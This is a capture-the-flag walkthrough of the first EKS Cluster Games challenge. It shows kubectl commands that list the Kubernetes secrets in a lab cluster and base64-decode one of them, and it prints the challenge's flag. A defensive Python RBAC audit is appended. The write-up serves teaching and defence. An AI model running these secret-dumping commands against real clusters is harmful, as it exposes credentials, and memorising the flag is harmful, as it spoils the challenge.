EKS Cluster Games 2023 - Challenge 1

Challenge #1: Secret Seeker

Introduction

You’ve hacked into a low-privileged AWS EKS pod. Use the web terminal below to find flags across the environment. Each challenge runs in a different Kubernetes namespace with varying permissions.

All K8s resources are crucial; challenges are based on real EKS misconfigurations and security issues.

Click “Begin Challenge” on your desktop, and for guidance, click the question mark icon for a useful cheat sheet.

Good luck!

Overview

There are 5 challenges in total. Each challenge can only be attempted when the previous challenge is solved.


Challenge #1: Secret Seeker

Scenario

Jumpstart your quest by listing all the secrets in the cluster. Can you spot the flag among them?

Walkthrough

The challenge title is pretty much self-explanatory: we are asked to retrieve a secret from this cluster. So let’s get started!

Every challenge page has a “View Permission” button, which shows the permissions granted to the service account the pod is running as.

For this challenge, we are granted read access to secrets (the get and list verbs):

{
    "secrets": [
        "get",
        "list"
    ]
}

Before we start solving the challenge, let’s look at the kube configuration:

root@wiz-eks-challenge:~# kubectl config view
apiVersion: v1
clusters:
- cluster:
    certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
    server: https://10.100.0.1
  name: localcfg
contexts:
- context:
    cluster: localcfg
    namespace: challenge1
    user: user
  name: localcfg
current-context: localcfg
kind: Config
preferences: {}
users:
- name: user
  user:
    token: REDACTED

The cluster is named localcfg, and the default namespace for the user named user is challenge1. Now we can run the following command to list the secrets in this namespace.

root@wiz-eks-challenge:~# kubectl get secrets
NAME         TYPE     DATA   AGE
log-rotate   Opaque   1      37h

We can see the log-rotate secret; let’s dump its content. The flag is stored base64-encoded under the data.flag key, so we extract that key with a JSONPath expression and decode it.

root@wiz-eks-challenge:~# kubectl get secrets log-rotate -ojsonpath='{.data.flag}' | base64 -d
wiz_eks_challenge{omg_over_privileged_secret_access}

Awesome! That is the flag for challenge #1. Now we can move on to the next challenge.
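As an added defender-side example (not part of the original write-up), the following Python audits a Role for the over-privileged secret access this challenge exploits and shows the least-privilege shape next to it. Both Role manifests are constructed for illustration and are not the challenge's actual RBAC.

```python
# Audit RBAC rules for broad read access to Secrets, the misconfiguration
# behind this challenge (get/list on every Secret in a namespace).
# The two Role dicts below are constructed samples in the shape kubectl
# returns; they are not the challenge's real RBAC objects.

SECRET_READ_VERBS = {"get", "list", "watch", "*"}

# Constructed: the kind of Role that yields {"secrets": ["get", "list"]}.
OVERPRIVILEGED_ROLE = {
    "kind": "Role",
    "metadata": {"name": "challenge1-sa-role", "namespace": "challenge1"},
    "rules": [
        {"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]},
    ],
}

# Constructed: least privilege for a workload that needs one secret.
# resourceNames pins the rule to a single object and "list" is dropped.
SCOPED_ROLE = {
    "kind": "Role",
    "metadata": {"name": "log-rotate-reader", "namespace": "challenge1"},
    "rules": [
        {"apiGroups": [""], "resources": ["secrets"],
         "resourceNames": ["log-rotate"], "verbs": ["get"]},
    ],
}


def permission_summary(role):
    """Collapse a Role into the {resource: [verbs]} view the challenge UI shows."""
    summary = {}
    for rule in role.get("rules", []):
        for resource in rule.get("resources", []):
            summary.setdefault(resource, set()).update(rule.get("verbs", []))
    return {res: sorted(verbs) for res, verbs in summary.items()}


def secret_findings(role):
    """Return one finding per rule that exposes Secrets more broadly than needed."""
    findings = []
    for i, rule in enumerate(role.get("rules", [])):
        resources = set(rule.get("resources", []))
        verbs = set(rule.get("verbs", []))
        if not ({"secrets", "*"} & resources) or not (SECRET_READ_VERBS & verbs):
            continue
        if {"list", "watch", "*"} & verbs:
            findings.append(f"rule {i}: list/watch/* on secrets enumerates every Secret in the namespace")
        elif not rule.get("resourceNames"):
            findings.append(f"rule {i}: get on secrets without resourceNames reads any Secret by name")
    return findings
```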